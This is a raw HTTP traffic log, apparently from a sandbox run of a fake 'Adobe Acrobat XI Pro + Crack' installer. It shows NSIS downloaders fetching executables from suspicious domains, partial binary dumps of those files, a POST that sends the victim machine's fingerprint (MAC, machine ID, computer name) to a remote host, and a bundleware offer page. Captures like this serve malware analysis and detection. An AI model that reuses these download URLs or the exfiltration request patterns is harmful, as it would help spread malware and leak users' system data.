cloudflare-nginx..CF-RAY: 3086aad035062914-OTP..0..
<<< skipped >>>
GET /launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 165
Connection: keep-alive
Date: Sun, 27 Nov 2016 15:38:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==
s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + CrackHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Content-Length: 165..Connection: keep-alive..Date: Sun, 27 Nov 2016 15:38:03 GMT..Server: Apache/2.2.15 (CentOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)..X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==..s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack..
GET /9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: elja.linggyp.ru
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 27 Nov 2016 15:37:49 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 3951944
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Adobe Acrobat XI Pro 11.0.exe"
Content-Transfer-Encoding: binary
Pragma: public
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@'...................@..........................p=.......<..........@...........................P#.81... %.IN...........(<.H%....#..m............................#.....................................................CODE....(........................... ..`DATA....lL.......N..................@...BSS..........P"......6"..................idata..81...P#..2...6".............@....tls....0.....#......h"..................rdata........#......h".............@..P.reloc...m....#..n...j".............@..P.rsrc...IN... %..P....#.............@..P.....................F-.............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Smallint..........p.@...Integer.............@...Byte............@...Word............@...Cardinal............@...Int64...................@...Double..@...@...Currency....@...ShortString.....@...WordBool...........@..False.True..@.@...LongBool.........<.@..False.True..h.@...Stringt.@...WideString..@...Variant.@...@...OleVariant..@...............................@..........C@..C@..C@..C@..C@..@@..A@.TA@..TObject..@
<<< skipped >>>
GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60676
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdedde2bb_ua.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:21 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1280e48937eca7de58e32cd35415f48a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oQ7y_HWecgaCXkCxikw8vq21OYN4z3k2ejmMGV3mJIa-ra6vjGhk6w==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................`............@.................................4........@..........................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....P......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1480261117&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:39 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZ..32e8..pbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiw
<<< skipped >>>
GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com
HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl
0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: application/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 27 Nov 2016 15:38:33 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:38:33 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716288
Connection: Close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R.......R...S...R..4....R..4....R..4....R.Rich..R.........................PE..L.....3X.................`...................p....@..........................@............@.............................................8E......................DZ.. u..................................@............p..\............................text...._.......`.................. ..`.rdata..T....p.......d..............@..@.data....[...0...4..................@....rsrc...8E.......F...J..............@..@.reloc..4].......^..................@..B......................................................................................................................................................................................................................................................................................................... ..........3.9.....V........D$.....^...j .UNF..#...3.9.tRj.h|.F..M..E......]..].......]..}...E.s..E.SSS.6Ph..F......YY...6...tF.Sj..M.......I....3..H..H....3...uH..|uH..xuH..tuH...uH..tuH..3.9..HH.t..=.HH....HH.s...HH..j...SF.......}.j.....F.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G\........F............................................................................................_x._|................V........D$..t.V.c=..Y..^...j...SF......j...vH.X3.3..}....vH...F...vH....vH.f...vH.
<<< skipped >>>
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:25:21 GMT
Expires: Mon, 28 Nov 2016 19:25:21 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245603
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:25:21 GMT..Expires: Mon, 28 Nov 2016 19:25:21 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 245603..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."........
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:31:39 GMT
Expires: Mon, 28 Nov 2016 19:31:39 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245227
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:31:39 GMT..Expires: Mon, 28 Nov 2016 19:31:39 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 245227..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242749
Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:58 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 242749..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....
GET /movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:41 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 36844
Connection: keep-alive
.............r.G.%...".s.......%.Dr.$!..$....h......P.B..>..w.9.....9.="#....z.l.l.v[`UVF.......g.?..-o.G...j.....?..d.X<...v...j&......t._.........].....r0_....V...o.D...ry.3......._wV......`9>......t9..w.....b.~../'........M.W..[...l>.^.g....a..O....l.,.........O........O...`..8.LF....M....|4y....K.V.f..o5..............h6}x6......t..K... ..._.my;.-.G#.._u.X<\.......'.E....i~.k^...fg....7...[.......|.............?X<.=.x0.0xpu....x....b2...&......./....?=..7...O..?........._..6....=../...........r{0.X]a?.....}9y.....n....h..w.......................h._/^.....a..........`q;={...-.g./........w...x..../G...h.......mPv8.y.&....3b.{p.........dg.h.Ml..............`............O.....?y.....V.....|t1.......l7...-Q...o.{<(.>|.....]n...W....nGsq..!.=...._?.....w.'....h.._.......t.O...........}.......Gz.gx8.^..c.y<|...>>.||.X.-A[..._........~.....~..o.=.....}.O.<z....O..y...W....;....w;.;}|.3...7;O.........t...tt1x..^...t....w.[..y.56'?....{...={h....Q....s.H.g.M"=;..o..?.....9.o...>.N..t>...../.8.[/~...pP.Z.0.`.<[,......j9...1.}..Ow1..`1j............[1....EK....W<{8x.,g...z>.4..F.^.....l....5W.G0...O<.&C......_...f6o0.d|..:.&..\..$.N...?....WW...d >.....2@/0..3.[.\.t./:...|..G3......../......`.G....;........O..U.cr}:.N....MG8I.i....S5.s...S.%.)s:^.<..D.\..Q..... ._hnd;..x..v..2...:3...w......gA......yh.P........%.;."....Z._;....jZnY...l....hN'......_'.s. I.f.|.&h.lT..a.............I|}...7.{-A...xa........%,.GgP.i...<;.w7...2..........z.qCU.3....B-.E.0'........
<<< skipped >>>
GET /js/main.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/javascript
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: W/"582622c6-368b"
Last-Modified: Fri, 11 Nov 2016 19:57:58 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 4244
Connection: keep-alive
...........[[s...~..h...H.HJ%..#{....bE.%.a..;.4.&.3....D...)...n...f...,.[............?@....).!....\z....*...>....>.\.l.j..$....c.x....x....5...........f.]s-....g.\a..8[bW.c.)x.g.k..[x.19ds....=...&..,..R..1n..7...M.....X,^..W.oU..K.?Q....B.`.P.\.?Y}......juk.g...U...S...w......||...O?G...........b..w.Z:X.*......@5}Y..n../......Z..ll.....0.X..O.w..5.r.,...O.....E0.y........Gu|..?..[.j5Z.xl1...M/.R.<M...H....MN. H4...P.Ly.Z.zy.g....GY.T.V`X......7=...... .f.E...[.>[zZz8.l.o......O<nw.R....L.x..AA.....5.C.i.N.....gZ..[m.S.q./g..\C.B,.6.X..........237F'..).Z.`.0...pX0c..}.6_.|CA.....g..u..........l..a-.q..g..k.#....l....fXfC.. ...f.\.;`.aZe&.`$.B..(....h....D..."~....`......J(.,.....J.gf.FF.bR5..Nj=.75......4.>.6.L..\.s...".,.:y... g..tK..s......c..k.$.......:...w...*`=W....Ht....&.LT..(... 5.9....&...Di..mnQ...6.D.R(U.uz..f.%...A...P..yT.um...`.cj=S..x. ..W...1..^b0...n2....R5Z.............&3........._._._.|...Q..g.I.....&.j.|.^T.;.P.^QT.F..<...o..1.V.2..!^..,.yp...;...dr...~.r....Y.:.}.....hh.....O\H.(.0'.aZC..&....Y.am...l.m........S&.....k........H.........4...`....7.-..&7....k.....z.O.fh.f...$~!..8.s.......Cc...z..kk..SxI.:..l.V-.F...9.P....e<..;..;.}4......a........a.......O...=...a.........{...]..i;.....>V.....c`....-.....7_.Z<...sr.$. .@.a.Wx.I...>UT`....{wB.n..#1.OcRr..c@}.....V.o....../k...X......{_.{.3d.4.\A... a.D......-.......P..d.;.w.;_......Z.BnD.q....P....g$Lq.....e........0.<;..LU.}.Z|...K,e..*,...#..#..........?.*........h.j...V.\R.....%.,6..b........m.. T...k
<<< skipped >>>
GET /img/favicon/cinemaden.com/favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: tour.cinemaden.com
Connection: Keep-Alive
Cookie: _ga=GA1.2.1439064958.1480261126; _gat=1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/x-icon
Date: Sun, 27 Nov 2016 15:38:47 GMT
ETag: "57325088-1536"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 5430
Connection: keep-alive
............ .h...&... .... .........(....... ..... .....@..................................................................................................................!...............................................................................q...............................#...[...........5...i...........9...............................5...%...........a.......................................%...A...m...o.......'...............}...........................!...o.......................................c...................................................................................G...........................................#.......................#...?.......S.......5...................!...................................e...............................................................q...................................................'.......#.......{.......................%...............................................{..........._...!...................................k...!...........1...)....................................................................................................................................................(... ...@..... ............................................................................................................................................#...................................................1.......................................................................................................................................................Q..........
<<< skipped >>>
GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com
HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl
0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: application/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...
GET /stats.php?bu=cp&c=&step= HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 62fcc6919801a5602c53d055b177c4f9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: v0nTILH8B7lO0atK9IGzAtS5FRJUiahDpMIx_3u_xZEqL90Dvtp00w==
GET /stats.php?bu=rx&c=&step=1 HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:32 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 d79148f01e44f5598c15bdd5ce1c1997.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qKy6xKjkeNG7i9e4v7zZ6rDXDkkh0I6BRjbfGxCgBigmeRoNylQypw==
GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563527, public, no-transform, must-revalidate
Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive
0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..20161127040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U....... ...:.....20161127040613Z....20161204040613Z0...*.H.............n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'......~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d........:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'GeoTrust Global CA TGV OCSP Responder 40.."0...*.H.............0.........[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo.............v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... 